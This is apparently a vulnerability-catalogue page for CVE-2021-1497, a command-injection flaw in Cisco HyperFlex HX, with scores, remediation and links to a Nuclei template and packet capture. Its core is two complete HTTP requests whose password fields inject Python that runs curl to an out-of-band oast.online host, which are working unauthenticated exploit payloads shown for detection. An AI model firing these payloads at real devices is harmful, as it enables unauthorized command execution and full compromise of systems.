🔙 목록으로 돌아가기

CVE-2021-1497: Cisco HyperFlex HX Data Platform - Remote Command Execution

TitleCisco HyperFlex HX Data Platform - Remote Command Execution
Authorgy741
SeverityCritical
ImpactAttackers can execute arbitrary commands on the device, potentially leading to full system compromise.
RemediationApply the latest security updates and patches provided by Cisco for HyperFlex HX.
CVSS Score9.8
EPSS Score0.94396
CVE IDCVE-2021-1497
CWE IDCWE-78
Tags cve cve2021 cisco rce oast kev packetstorm vkev vuln

🔍 Vulnerability Description

Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

🌐 HTTP Request

POST /auth/change HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 218
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=root&password=123%22%2C%22%22%246%24%24))%3B%20import%20os%3Bos.system(%22curl%20http%3A%2F%2Fd5jn3d9le0o4950ot9ag9izojnu8t9aqk.oast.online%20-H%20%5C%22User-Agent%3A%20HZABSn%5C%22%22)%3Bprint(crypt.crypt(%22
POST /auth HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Connection: close
Content-Length: 218
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=root&password=123%22%2C%22%22%246%24%24))%3B%20import%20os%3Bos.system(%22curl%20http%3A%2F%2Fd5jn3d9le0o4950ot9agdw1tnp5dy1nfj.oast.online%20-H%20%5C%22User-Agent%3A%20HZABSn%5C%22%22)%3Bprint(crypt.crypt(%22

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-1497.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-1497.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A